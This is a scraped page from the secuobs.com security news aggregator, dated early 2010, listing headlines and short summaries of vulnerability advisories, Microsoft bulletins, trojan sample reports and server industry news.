R2 Unleashed Now Available 1,680-pages, 3779 Google hit with antitrust probe in Europe This is why a search engine should only focus on search and nothing else Copyright 2006-2010, 4sysops, Digital fingerprint 3db371642e7c3f4fe3ee9d5cf7666eb0 http://www.secuobs.com/revue/news/195287.shtmlhttp://www.secuobs.com/revue/news/195287.shtml 2010-02-24 22:40:53 - News : Server shipments increased in the fourth quarter of 2009, but revenue fell as x86 servers continued to bite into the declining market for Unix servers with RISC and Itanium chips, Gartner said in a study released on Wednesday IMAGE http://www.secuobs.com/revue/news/195267.shtmlhttp://www.secuobs.com/revue/news/195267.shtml 2010-02-24 19:25:38 - Exploit DB updates : http://www.secuobs.com/revue/news/195186.shtmlhttp://www.secuobs.com/revue/news/195186.shtml 2010-02-24 03:47:03 - Exploit DB updates : http://www.secuobs.com/revue/news/194926.shtmlhttp://www.secuobs.com/revue/news/194926.shtml 2010-02-23 14:26:43 - Exploit DB updates : http://www.secuobs.com/revue/news/194609.shtmlhttp://www.secuobs.com/revue/news/194609.shtml 2010-02-23 10:03:26 - Packet Storm Security Exploits : SharePoint server suffers from a cross site scripting vulnerability http://www.secuobs.com/revue/news/194530.shtmlhttp://www.secuobs.com/revue/news/194530.shtml 2010-02-23 04:14:49 - News : The Web traffic study also finds issues with botnets, corporate policies, and outdated browsers IMAGE http://www.secuobs.com/revue/news/194428.shtmlhttp://www.secuobs.com/revue/news/194428.shtml 2010-02-22 22:27:08 - Chris Paget's Blog : Finally getting around to moving some of my web content across to a new server It s been smooth sailing so far but feel free to let me know if anything looks broken http://www.secuobs.com/revue/news/194335.shtmlhttp://www.secuobs.com/revue/news/194335.shtml 2010-02-22 17:58:47 - Help Net Security News : PGP Corporation announced its new PGP Key Management Server, which delivers open enterprise key and certificate management to global organizations Deployment and the need to manage encryption te http://www.secuobs.com/revue/news/194220.shtmlhttp://www.secuobs.com/revue/news/194220.shtml 2010-02-22 15:12:55 - Exploit DB updates : http://www.secuobs.com/revue/news/194154.shtmlhttp://www.secuobs.com/revue/news/194154.shtml 2010-02-22 15:09:25 - Infosecurity USA Latest News : PGP has released a new version of its Key Management Server designed to pull together disparate key management systems for enterprise customers http://www.secuobs.com/revue/news/194151.shtmlhttp://www.secuobs.com/revue/news/194151.shtml 2010-02-22 02:21:00 - SearchSecurity.com.au Analysis Commentary : Learn four ways to improve user access control under Windows Server 2008 in this tip IMAGE IMAGE IMAGE IMAGE http://www.secuobs.com/revue/news/193990.shtmlhttp://www.secuobs.com/revue/news/193990.shtml 2010-02-20 03:54:57 - What's New Cenzic Security Blog : Weekly product update Cenzic detects a Sun Java System Web Server Denial Of Service Vulnerability As of February 19, 2010 Cenzic now detects a Sun Java System Web Server 'admin' Server Denial of Service Vulnerability BugtraqID 37909 The Sun Java System Web Server is prone to a Denial Of Service Vulnerability An attacker can exploit this issue to crash the effected application, denying service to legitimate users Sun Java System Web Server 70 Update 6 is affected other versions may also be vulnerable Background on Cenzic s SmartAttacks Every week, Cenzic s suite of products is updated with the latest vulnerabilities custom, commercial, and open-source to better detect holes in Web applications These Web application vulnerabilities include but not limited to cross site scripting, buffer overflow, path or directory traversal, SQL injection, HTTP response splitting, and other workflow types by Erin Swanson Eswanson cenziccom See Also Sun Java System Web Server 'admin' Server Denial of Service Vulnerability Learn more about this vulnerability on Security Focus http://www.secuobs.com/revue/news/193733.shtmlhttp://www.secuobs.com/revue/news/193733.shtml 2010-02-20 00:14:24 - Exploit DB updates : http://www.secuobs.com/revue/news/193707.shtmlhttp://www.secuobs.com/revue/news/193707.shtml 2010-02-19 21:05:12 - pcapr updates : by latratnam http, tcp 23 packets, 8 KB 10101137 101010161 tcp 10466 80 SYN Seq 0 Win 65535 Len 0 MSS 1460 101010161 10101137 tcp 80 10466 SYN, ACK Seq 0 Ack 1 Win 5840 Len 0 MSS 1460 10101137 101010161 tcp 10466 80 ACK Seq 1 Ack 1 Win 65535 Len 0 10101137 101010161 http GET uploads tmptxt HTTP 11 http://www.secuobs.com/revue/news/193646.shtmlhttp://www.secuobs.com/revue/news/193646.shtml 2010-02-19 13:45:25 - Exploit DB updates : http://www.secuobs.com/revue/news/193528.shtmlhttp://www.secuobs.com/revue/news/193528.shtml 2010-02-19 02:04:28 - Exploit DB updates : http://www.secuobs.com/revue/news/193360.shtmlhttp://www.secuobs.com/revue/news/193360.shtml 2010-02-18 21:51:48 - How to remove : The file names EXE 2 LNK 10exe, serverexe have appeared in an virus analysis report You can see it on this linkThe installer is about 360 kb This is identified to be originated in Saudi Arabia It installs a component of backdoor Trojan Bifrose Please visit the site for rest of this article IMAGE IMAGE IMAGE IMAGE IMAGE IMAGE IMAGE IMAGE IMAGE IMAGE IMAGE http://www.secuobs.com/revue/news/193306.shtmlhttp://www.secuobs.com/revue/news/193306.shtml 2010-02-18 20:25:00 - New RFCs : 74KB Mobile IPv6 deployments may want to bootstrap their operations dynamically based on an interaction between the home agent and the Diameter server of the Mobile Service Provider This document specifies the interaction between a Mobile IP home agent and a Diameter server http://www.secuobs.com/revue/news/193270.shtmlhttp://www.secuobs.com/revue/news/193270.shtml 2010-02-17 20:51:42 - MSI State of Security : Project Honey Pot, a non-profit grassroots community of IT professionals founded in 2004 to capture and analyze malicious traffic, just captured its one billionth spam message It is marking the opportunity by releasing its findings They discovered that the number of computers co-opted as part of botnet operations has experienced a yearly average increase of http://www.secuobs.com/revue/news/192868.shtmlhttp://www.secuobs.com/revue/news/192868.shtml 2010-02-17 18:47:33 - BreakingPoint Labs Blog : Application Servers IMAGE IMAGE IMAGE IMAGE IMAGE IMAGE IMAGE http://www.secuobs.com/revue/news/192804.shtmlhttp://www.secuobs.com/revue/news/192804.shtml 2010-02-16 23:09:33 - News : It's a big day for BlackBerry-maker Research In Motion RIM The Canadian-handset-maker today made a couple of significant announcements in Barcelona, Spain, at this year's Mobile World Congress, including the introduction of a new version of its industry-lauded BlackBerry Enterprise Server BES software, BES Express IMAGE http://www.secuobs.com/revue/news/192483.shtmlhttp://www.secuobs.com/revue/news/192483.shtml 2010-02-16 23:07:42 - 4sysops : Windows Phone 7 Interface Microsoft Has Out-Appled Apple First smartphone that really deserves this name How to copy-paste between computers Benchmarks vSphere 40 vs XenServer 55 vs Hyper-V R2 for Terminal Services and VDI workloads Copyright 2006-2010, 4sysops, Digital fingerprint 3db371642e7c3f4fe3ee9d5cf7666eb0 http://www.secuobs.com/revue/news/192474.shtmlhttp://www.secuobs.com/revue/news/192474.shtml 2010-02-16 21:52:08 - News : An online retailer is selling a 12-core Opteron server processor from Advanced Micro Devices ahead of the product's official launch by the chip company IMAGE http://www.secuobs.com/revue/news/192434.shtmlhttp://www.secuobs.com/revue/news/192434.shtml 2010-02-16 01:25:37 - Exploit DB updates : http://www.secuobs.com/revue/news/192148.shtmlhttp://www.secuobs.com/revue/news/192148.shtml 2010-02-16 01:25:37 - Exploit DB updates : http://www.secuobs.com/revue/news/192147.shtmlhttp://www.secuobs.com/revue/news/192147.shtml 2010-02-16 01:25:37 - Exploit DB updates : http://www.secuobs.com/revue/news/192146.shtmlhttp://www.secuobs.com/revue/news/192146.shtml 2010-02-15 17:19:10 - Exploit DB updates : http://www.secuobs.com/revue/news/191992.shtmlhttp://www.secuobs.com/revue/news/191992.shtml 2010-02-15 16:53:02 - SSL Security News Feed : http wwwitwirecom business-it-news networking 36743-simple-exchange-server-certificate-management http://www.secuobs.com/revue/news/191985.shtmlhttp://www.secuobs.com/revue/news/191985.shtml 2010-02-15 13:09:27 - Help Net Security News : Anfibia Reactor is a web-based server monitoring solution that oversees the CPU, memory, battery, hard drives, makes sure network connections are working, checks databases, restarts services and more http://www.secuobs.com/revue/news/191924.shtmlhttp://www.secuobs.com/revue/news/191924.shtml 2010-02-15 06:54:27 - DarkReading All Stories : A short guide to securing data in virtualized server environments http://www.secuobs.com/revue/news/191882.shtmlhttp://www.secuobs.com/revue/news/191882.shtml 2010-02-14 23:28:43 - SkullSecurity : Thanks to a Google Alert on my name, I recently found Laurent Gaffié's blog post about MS10-006 Microsoft Technet link I found this vulnerability interesting because this style is something I've been thinking about for a couple years We in the industry have done all kinds of work wringing every last bug out of server http://www.secuobs.com/revue/news/191833.shtmlhttp://www.secuobs.com/revue/news/191833.shtml 2010-02-14 20:33:35 - Rootsecure.net : SANS Rogue DHCP server fun http://www.secuobs.com/revue/news/191820.shtmlhttp://www.secuobs.com/revue/news/191820.shtml 2010-02-14 14:13:22 - SANS Internet Storm Center InfoCON green : As part of the day job we are often asked to look at weird things for clients Earlier t more http://www.secuobs.com/revue/news/191781.shtmlhttp://www.secuobs.com/revue/news/191781.shtml 2010-02-14 11:53:48 - IT Solutions Knowledge Base : http://www.secuobs.com/revue/news/191769.shtmlhttp://www.secuobs.com/revue/news/191769.shtml 2010-02-12 00:34:02 - Hack In The Box : Virtualization is often considered a perfect match for an SME Its management is usually easierâ once you work out the infrastructure kinksâ and costs are lower, as it takes prime advantage of each physical server Yet, even with these clear benefits, virtual machines also come with their own set of security challenges RedCannon recently released the vDefense security appliance, a powerful and unique unified threat management system that monitors virtual servers built around VMware vSphere and helps SMEs with compliance enforcement, firewall and traffic isolation, and other security concerns â Virtualization is growing rapidly, making it easier to consolidate a number of physical boxes to give them higher scale and a broader range of services in a small environment,â says Vimal Vaidya, RedCannonâ s CEO, adding that the technique of running multiple operating systems and applications within those environments provides a way for a smaller company to offer a greater set of skilled services and to manage floor space, cooling, and the entire infrastructure more easily Yet, as Vaidya cautions, with this greater flexibility comes a greater need for managers to monitor VM security http://www.secuobs.com/revue/news/191148.shtmlhttp://www.secuobs.com/revue/news/191148.shtml 2010-02-11 23:01:51 - SearchVMware.com VMware tips and tricks : Learn how to query your VMware host servers with this PowerShell Primer IMAGE IMAGE IMAGE http://www.secuobs.com/revue/news/191112.shtmlhttp://www.secuobs.com/revue/news/191112.shtml 2010-02-11 22:37:08 - Exploit DB updates : http://www.secuobs.com/revue/news/191095.shtmlhttp://www.secuobs.com/revue/news/191095.shtml 2010-02-11 15:02:37 - Vigilance vulnérabilités publiques : Un attaquant non authentifié peut appeler certaines fonctions de XAPI http://www.secuobs.com/revue/news/190895.shtmlhttp://www.secuobs.com/revue/news/190895.shtml 2010-02-11 03:39:16 - News : Cloudcat can be used to develop and test Web apps in the cloud and to expand data center capacity IMAGE http://www.secuobs.com/revue/news/190765.shtmlhttp://www.secuobs.com/revue/news/190765.shtml 2010-02-11 00:11:15 - Packet Storm Security Last Files : Serverchkpy is a python script written to scan web applications for SQL injection vulnerabilities http://www.secuobs.com/revue/news/190691.shtmlhttp://www.secuobs.com/revue/news/190691.shtml 2010-02-10 21:56:39 - eSecurity Planet Features : Using an alternative DNS provider, such as OpenDNS or Google's Public DNS, can improve performance and increase security It's worth taking the time to compare your alternatives http://www.secuobs.com/revue/news/190621.shtmlhttp://www.secuobs.com/revue/news/190621.shtml 2010-02-10 14:16:57 - Les derniers documents du CERTA. : Une vulnérabilité dans Oracle WebLogic Server permet l'exécution de code arbitraire à distance http://www.secuobs.com/revue/news/190443.shtmlhttp://www.secuobs.com/revue/news/190443.shtml 2010-02-10 13:58:42 - TorrentFreak : Twitter is calling in the help of BitTorrent to deploy files across its many servers in a more efficient way The project dubbed 'Murder' is based on the Open Source BitTornado BitTorrent client Aside from assisting Twitter it is available to other developers at no cost http://www.secuobs.com/revue/news/190433.shtmlhttp://www.secuobs.com/revue/news/190433.shtml 2010-02-10 13:57:49 - PenTestIT : You must be aware of our List of Web Application Stress Testers On the same lines, we have a server stress tester legitStress In our set up environment, we were able to load multiple copies of legitStress We did have to make some tweaks inorder for it to run to our likings It offers IMAGE IMAGE IMAGE IMAGE IMAGE IMAGE http://www.secuobs.com/revue/news/190432.shtmlhttp://www.secuobs.com/revue/news/190432.shtml 2010-02-10 10:15:33 - Rootsecure.net : The Register Webhost in five day server FAIL http://www.secuobs.com/revue/news/190391.shtmlhttp://www.secuobs.com/revue/news/190391.shtml 2010-02-09 21:30:26 - Microsoft Security Bulletins : Bulletin Severity Rating Important - This security update resolves a privately reported vulnerability in Windows Server 2008 Hyper-V and Windows Server 2008 R2 Hyper-V The vulnerability could allow denial of service if a malformed sequence of machine instructions is run by an authenticated user in one of the guest virtual machines hosted by the Hyper-V server An attacker must have valid logon credentials and be able to log on locally into a guest virtual machine to exploit this vulnerability The vulnerability could not be exploited remotely or by anonymous users http://www.secuobs.com/revue/news/190172.shtmlhttp://www.secuobs.com/revue/news/190172.shtml 2010-02-09 21:30:26 - Microsoft Security Bulletins : Bulletin Severity Rating Important - This security update resolves a privately reported vulnerability in Microsoft Windows Client Server Run-time Subsystem CSRSS The vulnerability could allow elevation of privilege if an attacker logs on to the system and starts a specially crafted application designed to continue running after the attacker logs out An attacker must have valid logon credentials and be able to log on locally to exploit this vulnerability The vulnerability could not be exploited by anonymous users http://www.secuobs.com/revue/news/190171.shtmlhttp://www.secuobs.com/revue/news/190171.shtml 2010-02-09 21:30:26 - Microsoft Security Bulletins : Bulletin Severity Rating Important - This security update resolves several privately reported vulnerabilities in Microsoft Windows The most severe of these vulnerabilities could allow remote code execution if an attacker created a specially crafted SMB packet and sent the packet to an affected system Firewall best practices and standard default firewall configurations can help protect networks from attacks originating outside the enterprise perimeter that would attempt to exploit these vulnerabilities http://www.secuobs.com/revue/news/190170.shtmlhttp://www.secuobs.com/revue/news/190170.shtml 2010-02-09 18:57:29 - Security International : Optelecom-NKF Inc announces the release of its new Siqura video server http://www.secuobs.com/revue/news/190108.shtmlhttp://www.secuobs.com/revue/news/190108.shtml 2010-02-09 17:56:54 - Global Security Mag Online : Pour la sortie de sa nouvelle version, Kerio MailServer devient Kerio Connect 7 et permet d'aller encore plus loin dans le partage de données Le nouveau serveur collaboratif Kerio Connect 7 marque l'entrée du serveur de messagerie sur le marché des entreprises multi-sites Il donne la possibilité aux clients de lier les serveurs autonomes en un système unique de domaines distribués Nouveauté le domaine distribué La gestion de domaines distribués est partie intégrante de la nouvelle console - Business http://www.secuobs.com/revue/news/190078.shtmlhttp://www.secuobs.com/revue/news/190078.shtml 2010-02-09 15:11:36 - Infosecurity.US : The Apache Foundation, authors of the most popular web server product in existence Apache HTTP Server has released the final code update to the OpenSource groups highly respected web daemon More information, with links, appears after the page break Apache HTTP Server 1342 Released The Apache Software Foundation and the Apache HTTP http://www.secuobs.com/revue/news/190017.shtmlhttp://www.secuobs.com/revue/news/190017.shtml 2010-02-09 15:07:10 - How to remove : The file names Servercexe, eset Serialsexe have appeared in an virus analysis report You can see it on this link The installer is about 321 kb It installs a component of backdoor Trojan Bifrose or BiFrost It connects to remote hosts It can Please visit the site for rest of this article IMAGE IMAGE IMAGE IMAGE IMAGE IMAGE IMAGE IMAGE IMAGE IMAGE IMAGE http://www.secuobs.com/revue/news/190013.shtmlhttp://www.secuobs.com/revue/news/190013.shtml 2010-02-09 03:32:41 - SANS Internet Storm Center InfoCON green : more http://www.secuobs.com/revue/news/189855.shtmlhttp://www.secuobs.com/revue/news/189855.shtml 2010-02-09 03:28:58 - eWeek Security Watch : Oracle has pushed out an emergency fix for a vulnerability made public on a Web site roughly two weeks ago IMAGE IMAGE IMAGE http://www.secuobs.com/revue/news/189854.shtmlhttp://www.secuobs.com/revue/news/189854.shtml 2010-02-09 02:49:23 - securitystream.info : Sicko Servers on the network of Leeds Primary Care NHS Trust were struck down by the Conficker worm late last week Related posts 1 Manchester cops recover from Conficker 2 Manchester cops clobbered by Conficker 3 Conficker jams up developing interwebs http://www.secuobs.com/revue/news/189838.shtmlhttp://www.secuobs.com/revue/news/189838.shtml 2010-02-09 00:43:25 - Help Net Security News : When a file is created on a Windows system, a DOS-compatible 83 short file name hereafter referred to as '83 alias' is generated for backwards compatibility reasons Both names can be used to refe http://www.secuobs.com/revue/news/189791.shtmlhttp://www.secuobs.com/revue/news/189791.shtml 2010-02-08 23:31:54 - News : As virtualization stretches deeper into the enterprise to include mission-critical and resource-intensive applications, IT executives are learning that double-digit physical-to-virtual server ratios are things of the past IMAGE http://www.secuobs.com/revue/news/189769.shtmlhttp://www.secuobs.com/revue/news/189769.shtml 2010-02-08 19:21:08 - News : IBM on Monday launched its latest Power7 processor, which adds more cores and improved multithreading capabilities to boost the performance of servers requiring high up time IMAGE http://www.secuobs.com/revue/news/189693.shtmlhttp://www.secuobs.com/revue/news/189693.shtml 2010-02-06 03:03:52 - SANS Internet Storm Center InfoCON green : Oracle issued a Security Alert that address a vulnerability in the Node Manager component of Oracle more http://www.secuobs.com/revue/news/189175.shtmlhttp://www.secuobs.com/revue/news/189175.shtml 2010-02-05 23:36:46 - Zero Day : The patch follows the public release of exploit code as part of the recent Week of Web Server Bugs IMAGE http://www.secuobs.com/revue/news/189125.shtmlhttp://www.secuobs.com/revue/news/189125.shtml 2010-02-05 23:34:31 - News : Advanced Micro Devices will put more focus on tightly integrating graphics processor cores into mainstream servers starting 2012 as it tries to increase system performance, a company executive said IMAGE http://www.secuobs.com/revue/news/189115.shtmlhttp://www.secuobs.com/revue/news/189115.shtml 2010-02-04 21:26:52 - Security : Microsoft has issued Security Advisory 980088 to address a publicly disclosed vulnerability in Internet Explorer that may allow information disclosure for Windows XP users or for users who have disabled Internet Explorer Protected Mode The advisory explains that content can be forced to render incorrectly from local files in such a way that information can be exposed to malicious websites The vulnerability was discussed in depth at this week's Black Hat DC conference by Jorge Luis Alvarez Medina, a security consultant with Core Security Technologies who revealed the issue a day after Microsoft released an out-of-band security bulletin for the browser Here's the official description of the briefing In this presentation we will show how an attacker can read every file of your filesystem if you are using Internet Explorer This attack leverages different design features of Internet Explorer entailing security risks that, while low if considered isolated, lead to interesting attack vectors when combined altogether We will also disclose and demonstrate proof of concept code developed for the scenarios proposed Users running a version of Internet Explorer that does not have Protected Mode, or users who have decided to disable Protected Mode, are exposed to an attacker who can access files with an already known filename and location Versions affected include Internet Explorer 501 and IE6 SP1 on Windows 2000 SP4, as well as IE6, IE7, and IE8 on supported editions of Windows XP and Windows Server 2003 Microsoft made sure to note that Protected Mode prevents exploitation of this vulnerability and is running by default for IE7 and IE8 on Windows Vista, Windows Server 2008, Windows 7, and Windows Server 2008 R2 Redmond also underlined that it is currently unaware of any attacks trying to use the vulnerability and is actively monitoring the situation and may provide a security update on an upcoming Patch Tuesday or an out-of-cycle patch once it is ready The next Patch Tuesday is scheduled for February 9, 2009, but we're not likely to see a patch out that soon As always, Microsoft is recommending users upgrade to IE8 the company urged users to upgrade away from IE6 and XP after hacks affecting IE6 last month In the meantime, the software giant listed five mitigating factors for the vulnerability Protected Mode in IE7 IE8 on Windows Vista and later limits the impact of the vulnerability In a Web-based attack scenario, an attacker could host a webpage that is used to exploit this vulnerability or do so via a webpage that accepts or hosts user-provided content or advertisements In all cases, however, an attacker would have no way to force users to visit these websites and would have to convince them to do so, which is typically achieved via an e-mail or instant message An attacker who successfully exploited this vulnerability could gain the same user rights as the local user Users whose accounts are configured to have fewer user rights on the system could be less affected than users who operate with administrative user rights By default, Internet Explorer on Windows Server 2003 and Windows Server 2008 runs in a restricted mode known as Enhanced Security Configuration This mode sets the security level for the Internet zone to High and so is a mitigating factor for websites that you have not added to the Internet Explorer Trusted sites zone By default, all supported versions of Outlook, Outlook Express, and Windows Mail open HTML e-mail messages in the Restricted sites zone, which should mitigate attacks trying to exploit this vulnerability by preventing Active Scripting and ActiveX controls from being used However, if a user clicks a link in an e-mail message, the user could still be vulnerable to exploitation of this vulnerability through the Web-based attack scenario Microsoft outlined three workarounds in the security advisory The first is to modify Internet Explorer's settings set the Internet and Local intranet security zone settings to High to prompt before running ActiveX Controls and Active Scripting in these zones The second suggests configuring Internet Explorer to prompt before running Active Scripting or disabling Active Scripting completely in the Internet and local intranet security zone The third one is to enable Internet Explorer Network Protocol Lockdown for Windows XP It requires editing the Windows registry, but thankfully Microsoft has created a Fix it for me for this workaround, available at KB 980088 Just click the Fix this problem link and you're good to go The Fix It automates Network Protocol Lockdown and can be run on individual systems and deployed by enterprises through their automated systems IMAGE IMAGE IMAGE http://www.secuobs.com/revue/news/188696.shtmlhttp://www.secuobs.com/revue/news/188696.shtml 2010-02-04 20:51:36 - Dan Griffin's Blog : For those of you who are still running Windows Small Business Server 2003 and note that my own employer is in that group be warned that the Windows Server 2003 product family lapses into extended support as of this summer What s the difference between mainstream and extended support Here s a handy chart about http://www.secuobs.com/revue/news/188685.shtmlhttp://www.secuobs.com/revue/news/188685.shtml 2010-02-04 20:22:38 - Network World on Security : In a live demonstration Wednesday at the Black Hat DC conference, a security consultant showed how it's possible to exploit a flaw in the Microsoft Internet Explorer browser to remotely read files on the victim's local drive, prompting a security advisory from Microsoft http://www.secuobs.com/revue/news/188675.shtmlhttp://www.secuobs.com/revue/news/188675.shtml 2010-02-04 18:22:49 - Les derniers documents du CERTA. : Une vulnérabilité dans Citrix XenServer permet de contourner la politique de sécurité http://www.secuobs.com/revue/news/188630.shtmlhttp://www.secuobs.com/revue/news/188630.shtml 2010-02-04 18:22:49 - Les derniers documents du CERTA. : Une vulnérabilité permettant de provoquer un déni de service ou d'exécuter du code arbitraire à distance a été découverte dans Apache HTTP Server http://www.secuobs.com/revue/news/188624.shtmlhttp://www.secuobs.com/revue/news/188624.shtml 2010-02-04 18:11:11 - Exploit DB updates : http://www.secuobs.com/revue/news/188616.shtmlhttp://www.secuobs.com/revue/news/188616.shtml 2010-02-04 15:38:09 - securitystream.info : Unwanted promotion for older Windows boxes Microsoft has begun investigating a new flaw in IE that most affects older versions of Windows, and turns vulnerable systems into a public file server Related posts 1 Win 7 remote kernel crasher code released 2 Windows plagued by 17-year-old privilege escalation bug 3 Stubborn trojan stashes install file in Windows help http://www.secuobs.com/revue/news/188566.shtmlhttp://www.secuobs.com/revue/news/188566.shtml 2010-02-04 04:16:11 - New RFCs : 368KB The Media Server Markup Language MSML is used to control and invoke many different types of services on IP media servers The MSML control interface was initially driven by RadiSys with subsequent significant contributions from Intel, Dialogic, and others in the industry Clients can use it to define how multimedia sessions interact on a media server and to apply services to individuals or groups of users MSML can be used, for example, to control media server conferencing features such as video layout and audio mixing, create sidebar conferences or personal mixes, and set the properties of media streams As well, clients can use MSML to define media processing dialogs, which may be used as parts of application interactions with users or conferences Transformation of media streams to and from users or conferences as well as interactive voice response IVR dialogs are examples of such interactions, which are specified using MSML MSML clients may also invoke dialogs with individual users or with groups of conference participants using VoiceXMLThis document is not an Internet Standards Track specification it is published for informational purposes http://www.secuobs.com/revue/news/188416.shtmlhttp://www.secuobs.com/revue/news/188416.shtml 2010-02-04 01:44:26 - SearchSecurity.com.au Analysis Commentary : Nick Lewis looks at the recent vulnerability discovered in Windows Server Message Block and assesses whether you should apply the patch, or just disable the software IMAGE IMAGE IMAGE IMAGE http://www.secuobs.com/revue/news/188386.shtmlhttp://www.secuobs.com/revue/news/188386.shtml 2010-02-04 01:44:26 - SearchSecurity.com.au Analysis Commentary : Learn how to create a server patch management strategy for virtual servers with this tutorial IMAGE IMAGE IMAGE IMAGE http://www.secuobs.com/revue/news/188385.shtmlhttp://www.secuobs.com/revue/news/188385.shtml 2010-02-04 00:27:35 - News : Intel is preparing six-core chips for high-end desktops and servers for release in the first half of this year, the company said Wednesday IMAGE http://www.secuobs.com/revue/news/188355.shtmlhttp://www.secuobs.com/revue/news/188355.shtml 2010-02-03 20:52:28 - LinuxSecurity.com Latest News : LinuxSecuritycom The Apache HTTP Server developers have released version 1342 of the popular web server, noting that this will be the last update for the 13 series The release of 1342 is a bug fix and security release, with one moderate security flaw in mod_proxy fixed by preventing integer overflow on platforms where the size of an integer variable in memory was less than that of a long variable http://www.secuobs.com/revue/news/188281.shtmlhttp://www.secuobs.com/revue/news/188281.shtml 2010-02-03 20:47:06 - eSecurity Planet Features : Old flaws with new attack vectors re-emerge for IE on Windows XP, but there is help for users http://www.secuobs.com/revue/news/188280.shtmlhttp://www.secuobs.com/revue/news/188280.shtml 2010-02-03 20:00:03 - N Stalker Web Security Community : Portugues pt_BR Certamente todo administrador linux ou de segurança já trabalhou com a serie 13 do Apache Certamente ela deixara saudades para a velha guarda mais a evolução é necessária Foi anunciado hoje 02 02 2010 a última versão da serie apache 13 No release 1342 informaram o fim da era da versão 13 e que o http://www.secuobs.com/revue/news/188260.shtmlhttp://www.secuobs.com/revue/news/188260.shtml 2010-02-03 16:43:44 - threatpost The First Stop for Security News : The release of 1342 is a bug fix and security release, with one moderate security flaw in mod_proxy fixed by preventing integer overflow on platforms where the size of an integer variable in memory was less than that of a long variable Read the full article The H Security Shorten URL http threatpostcom en_us 3Up Click to copy to clipboard or post to Twitter http://www.secuobs.com/revue/news/188169.shtmlhttp://www.secuobs.com/revue/news/188169.shtml 2010-02-03 16:24:05 - SearchSecurity Threat Monitor : Nick Lewis reviews the recent vulnerability discovered in a popular Windows file-sharing and printing protocol Yes, there's a patch, but should you deploy it, or simply disable SMBv2 IMAGE IMAGE IMAGE http://www.secuobs.com/revue/news/188164.shtmlhttp://www.secuobs.com/revue/news/188164.shtml 2010-02-02 22:59:42 - News : Dell is hatching a plan to take some of the custom servers designed by its Data Center Solutions division for Web giants such as Yahoo and Facebook and sell them to a wider range of companies, including large enterprises, Dell executives said IMAGE http://www.secuobs.com/revue/news/187880.shtmlhttp://www.secuobs.com/revue/news/187880.shtml 2010-02-02 11:03:05 - How to remove : The file names SOHAEXE, serverupdexe, serverexe have appeared in an virus analysis report You can see it on this link The installer is about 102 kb It installs a component of backdoor Trojan Bifrose or BiFrost It connects to remote hosts Please visit the site for rest of this article IMAGE IMAGE IMAGE IMAGE IMAGE IMAGE IMAGE IMAGE IMAGE IMAGE IMAGE http://www.secuobs.com/revue/news/187641.shtmlhttp://www.secuobs.com/revue/news/187641.shtml 2010-02-02 08:25:51 - How to remove : The file names tempejeexe, serverexe have appeared in an virus analysis report You can see it on this link The installer is about 82 kb It installs a component of backdoor Trojan Bifrose or BiFrost It connects to remote hosts It can Please visit the site for rest of this article IMAGE IMAGE IMAGE IMAGE IMAGE IMAGE IMAGE IMAGE IMAGE IMAGE IMAGE http://www.secuobs.com/revue/news/187622.shtmlhttp://www.secuobs.com/revue/news/187622.shtml 2010-02-01 12:50:08 - How to remove : The file name G_Server203exe has appeared in an virus analysis report You can see it on this link Threatexpert identifies this as a trojan virus and keylogger originated in China It may allow remote access to hackers to the infected computerIt Please visit the site for rest of this article IMAGE IMAGE IMAGE IMAGE IMAGE IMAGE IMAGE IMAGE IMAGE IMAGE IMAGE http://www.secuobs.com/revue/news/187264.shtmlhttp://www.secuobs.com/revue/news/187264.shtml 2010-01-31 18:30:03 - Bill Mullins' Weblog Tech Thoughts : It s often said that no good deed goes unpunished Generally, this statement means that one can attempt to be helpful to others, and despite good intentions, end up paying an unexpected price That seems to be the case in Zemana s good deed, in providing a free license for their superb security application AntiKeylogger Over the course of http://www.secuobs.com/revue/news/187071.shtmlhttp://www.secuobs.com/revue/news/187071.shtml 2010-01-31 15:58:48 - Office of Inadequate Security : The Iowa Racing and Gaming Commission said Friday that its database containing licensing information of racetrack and casino employees had been compromised after a firewall was breached by an outside Internet address A news release issued by the commission said that the breach took place Tuesday when one of the firewalls was circumvented due to network http://www.secuobs.com/revue/news/187059.shtmlhttp://www.secuobs.com/revue/news/187059.shtml 2010-01-30 23:42:15 - Computer Security News : The Iowa Racing and Gaming Commission says someone gained access to a computer server that holds more than 80,000 records containing casino employee information http://www.secuobs.com/revue/news/187002.shtmlhttp://www.secuobs.com/revue/news/187002.shtml 2010-01-30 11:48:14 - Rootsecure.net : The Register CIA, PayPal under bizarre SSL assault Shadowserver has identified 315 websites that are the recipients of the SSL assault In addition to ciagov and paypalcom http://www.secuobs.com/revue/news/186942.shtmlhttp://www.secuobs.com/revue/news/186942.shtml 2010-01-30 03:51:14 - News : Virtualization capacity planning tools are available all over, but sometimes the intangibles make a big impact on performance Here's expert advice on proper sizing of physical servers for multiple VMs IMAGE http://www.secuobs.com/revue/news/186881.shtmlhttp://www.secuobs.com/revue/news/186881.shtml 2010-01-29 18:44:48 - Les derniers documents du CERTA. : De multiples vulnérabilités permettant entre autres l'exécution de code arbitraire à distance ont été corrigées dans Sun Java System Web Server http://www.secuobs.com/revue/news/186719.shtmlhttp://www.secuobs.com/revue/news/186719.shtml 2010-01-29 18:44:48 - Les derniers documents du CERTA. : Une vulnérabilité dans Symantec Altiris Notification Server permet de dévoiler des informations sur les machines du réseau et, dans certains cas, d'exécuter du code arbitraire à distance http://www.secuobs.com/revue/news/186712.shtmlhttp://www.secuobs.com/revue/news/186712.shtml 2010-01-29 11:44:18 - Vigilance vulnérabilités publiques : Lorsque WebDAV est activé sur Sun Java System Web Server, un attaquant peut employer des données XML illicites, afin de provoquer une attaque par format, conduisant à un déni de service ou à l'exécution de code http://www.secuobs.com/revue/news/186581.shtmlhttp://www.secuobs.com/revue/news/186581.shtml 2010-01-28 19:41:39 - ethicalhack3r : Why does upscaling servers makes sense I have no idea why upscaling servers makes sense Sorry if you thought this post was going to be informative Unfortunately I m playing a game called GoogleGrope where bloggers compete to be the top result in a Google search for the search phrase upscaling servers makes sense This is just http://www.secuobs.com/revue/news/186356.shtmlhttp://www.secuobs.com/revue/news/186356.shtml 2010-01-28 19:01:04 - Les derniers documents du CERTA. : Une vulnérabilité dans Citrix XenServer permet entre autres l'exécution de code arbitraire à distance http://www.secuobs.com/revue/news/186340.shtmlhttp://www.secuobs.com/revue/news/186340.shtml 2010-01-28 09:49:58 - Security Database Tools Watch : This is a tool for security researchers It allows you to search for either an IP address or a DNS name and display all associated domain names known to Bing If a specific IP address is searched, all domain records associated with that address are displayed If a DNS name is searched, all domain records associated with all addresses returned for that DNS name are displayed Two separate self-contained versions of the tool are available command-line-based and GUI-based The GUI version - Security Tools Information Gathering, BingProbe IMAGE IMAGE IMAGE IMAGE IMAGE 